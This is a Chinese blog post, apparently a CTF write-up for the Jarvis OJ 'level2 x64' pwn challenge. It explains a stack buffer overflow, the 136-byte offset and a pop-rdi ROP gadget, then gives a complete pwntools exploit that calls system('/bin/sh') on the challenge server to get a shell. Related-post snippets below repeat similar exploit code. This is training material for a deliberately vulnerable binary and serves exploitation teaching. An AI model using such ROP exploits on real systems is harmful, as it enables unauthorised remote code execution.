CTF PWN [XMAN]level2(x64)

最新推荐文章于 2023-02-19 15:39:15 发布
最新推荐文章于 2023-02-19 15:39:15 发布
阅读量376 收藏
点赞数
分类专栏: CTF PWN 文章标签: 信息安全 python shell linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41743240/article/details/105393900
版权
CTF 同时被 2 个专栏收录
12 篇文章 0 订阅
订阅专栏
PWN
5 篇文章 0 订阅
订阅专栏

CTF PWN [XMAN]level2(x64)

题目地址

首先进行checksec保护机制的查询
在这里插入图片描述
发现只开了NX,所以不能利用shellcode方式获取shell,这里采用ROP方式获取shell

IDA反编译查看伪源码

程序非常简单,两个函数

main:
在这里插入图片描述
vulnerable_function:
在这里插入图片描述
在vulnerable_function有个问题,buf申请空间为0x80字节,然而可以读取0x200
字节,导致溢出
在这里插入图片描述
查看字符串,可以发现system和/bin/sh

利用思路

先通过溢出漏洞覆盖RIP为pop rdi,紧随/bin/sh和system,获取shell

计算溢出偏移,buf大小为0x80,十进制128,与RIP相隔RBP,64位地址占8字节,所以偏移为128+8=136

获取pop rdi,使用以下命令
ROPgadget --binary level2 --only “pop|ret”

exploit:

```#coding:utf-8
from pwn import *

#buf 大小为0x80,十进制128,与RIP相隔RBP,64位地址占8字节,
#所以偏移为128+8=136

r=remote('pwn2.jarvisoj.com',9882)
e=ELF('level2')

#ROPgadget --binary level2 --only "pop|ret"
#pop rdi:0x4006b3
payload='A'*136+p64(0x4006b3)+p64(e.search('/bin/sh').next())+p64(e.sym['system'])
r.send(payload)

r.interactive()
0kam1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
安恒ctf pwn课件
10-06
安恒培训资料 栈溢出指的是程序向栈中某个局部变量中写入的字节数超过了这个变量本身所申 请的字节数,因而导致与其相邻的栈中的变量的值被改变。 Ø 程序能够向栈上写入数据。 Ø 写入的数据大小没有被良好地控制。...
CTF PWN - ROP ->Payload实例(攻防世界level2)
yajuanpi4899的博客
11-04 1423
ROP(Return Oriented Programming)攻击原理:提取反汇编中以ret结尾的代码片段或函数组合实现拓展可写栈空间,组成/bin/sh等常用系统执行命令。 ret指令:将ESP(栈顶地址)中地址弹出至EIP寄存器,代码自动跳转到之前栈顶存放的返回地址,以此构成rop链。(X86)rop链即是基于以上这个简单的原理,在代码空间中寻找以ret结尾的代码片段或函数(代码片段称为Rop gadgets),组合可以实现拓展可写栈空间、写入内存、shell等功能,依靠ret将代码执行权紧握在自己
CTF-PWN-level2(x64)(Jarvis OJ)
SuperGate的博客
02-15 485
这道题和level2的32位版本的漏洞一样,不过32位程序函数的参数是压在栈中的,而64位程序的前6个参数是存在寄存器中的,第7个开始才压入栈中。 由于我们的目的是将system函数的参数改为/bin/sh,所以我们考虑用pop edi ret 语句将字符串赋值给edi。 同样的,程序中hint存入了/bin/sh,我们直接使用即可。 system函数的地址也很容易获得,剩下的就是pop e...
(Jarvis Oj)(Pwn) level2(x64)
Nothing
04-19 1397
(Jarvis Oj)(Pwn) level2(x64) 首先用checksec查一下保护,和level2一样。 反汇编,程序和32位的程序几乎一致。找到溢出点。 那么溢出思路也和32位的差不多,唯一不同的是,64位程序在调用system函数时,参数的传递方式和32位不一样,32位是通过栈传参,而64位通过edi寄存器传参,所以这时我们的思路变成如何覆盖edi的值,通过基本rop就可...
XCTF-pwn level2 - Writeup
菜小狗.的博客
08-02 4957
XCTF-pwn-level2 WP 终于可以写这个pwn题的wp咯~ 很开心,说明我又有一些收获来解决了一些问题 题目描述:菜鸡请教大神如何获得flag,大神告诉他‘使用面向返回的编程(ROP)就可以了’ 先将elf文件下载丢到乌班图里查看一下文件类型,通过checksec查看一下保护情况最后在运行一下瞅瞅到底运行起来是杂肥似。 可以看到NX这项保护是开启的状态,这意味着:栈中数据没有执行...
[CTF-PWN]攻防世界新手村-level2[wp]
murongxuege的博客
10-04 619
事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候,从头到尾刷一遍题,总结思路。 题目分析 开启场景后,服务端会开启对应的端口,并在端口上部署和附件相同的ELF二进制可执行文件,我们要做的就是下载附件并在本地进行反汇编,反编译等操作分析程序漏洞,从而利用漏洞获取题目的flag。 checksec监测 file查看一下文件属性,可以看到文件是linux elf文件,32字节,Inter80386微处理器。 checksec的常用命令是:c
CTF PWN 武器库题
12-12
CTF PWN 武器库题或rifle题,利用fastbin堆溢出得shell
CTF PWN专用虚拟机-附件资源
03-05
CTF PWN专用虚拟机-附件资源
welpwn::sparkling_heart:CTFpwn框架
02-04
2.19、2.23-2.29 32位和64位调试增强(支持PIE )。 符号断点杂项libc-database one_gadget 堆? 好吧,不支持堆分析。 但是我有一个给你的礼物。安装您有两种使用welpwn 。通过安装从0.9.3版本开始已添加setup.py ...
pwn07.ret2syscall例题
11-11
ret2syscall例题
pwn栈溢出10道练习题有writeup
01-04
pwn栈溢出练习题目,每题都有writeup.
level2--writeup
ATFWUS的博客
03-01 584
文件下载地址: 链接:https://pan.baidu.com/s/1jiR84G8Ji3luscmYTOOKAA 提取码:jz7n 0x01.分析 checksec: 32位程序,开启NX。 源码: 发现系统调用了system,但是参数并不是/bin/sh,后面有read函数,存在栈溢出,继续寻找,看是否有bin/sh: 果然存在。 得到bin/sh的地址...
level2 [XCTF-PWN]CTF writeup系列6
重新启程
12-19 529
题目地址:level2 先看看题目内容: 照例下载文件,检查一下保护机制 root@mypwn:/ctf/work/python# checksec 15bc0349874045ba84bb6e504e910a46 [*] '/ctf/work/python/15bc0349874045ba84bb6e504e910a46' Arch: i386-32-little ...
WUSTCTF2020]level2 wp
weixin_47158947的博客
08-05 630
1.ida打开 upx加壳了,脱壳 但是用软件脱不了,于是用虚拟机脱壳,脱壳成功用ida打开 然后看一下字符串就找到了 wctf2020{Just_upx_-d} flag{Just_upx_-d}
夏令营第二周pwnlevel-x64题总结
MIGENGKING的博客
07-26 337
今天我来总结一下pwnlevel2_x64: 我们直接把题目放进ubuntu虚拟机查看题目: 发现题目的arch模块是64位的;NX保护模式开启,所无法构建shellcode拿到shell/ 接下把文件放进IDAx64分析: ...
栈溢出基础练习题——3 (内有32和64位区别的对比)
qq_41696518的博客
07-07 292
pwn练习题-level2
PWN入门
247533的博客
02-19 589
pwn exp
Jarvis OJ [XMAN]level2(x64)
九层台
07-07 1132
liu@liu-F117-F:~/桌面/oj/level2_x64$ checksec level2_x64 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level2_x64/level2_x64' Arch: amd64-64-little RELRO: No RELRO Stack: No canary fo...
jarvisoj——[XMAN]]level2(x64)
王嘟嘟的博客
07-19 334
题目 Wp 这里检查一下基础项 这里看了一下,发现还是read这里出现了问题,需要进行覆盖 构造一下payload from pwn import * r=process("./level2_x64") #r=remote('pwn2.jarvisoj.com',9882) e=ELF('./level2_x64') sys_addr=e.symbols['system'] bin_addr=e.search("/bin/sh").next() pop_rdi=0x4006b3 payload='
ctf pwn题怎么生成64位的shellcode
最新发布
03-25
64位Linux:objdump -d shellcode | grep '^ ' | cut -f2 | perl -pe 's/(\S{2})/\\x\1/g' 64位Windows:将机器码从shellcode.exe文件中提取,然后使用在线工具转换为十六进制字符串。 4. 将生成的十六进制字符...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值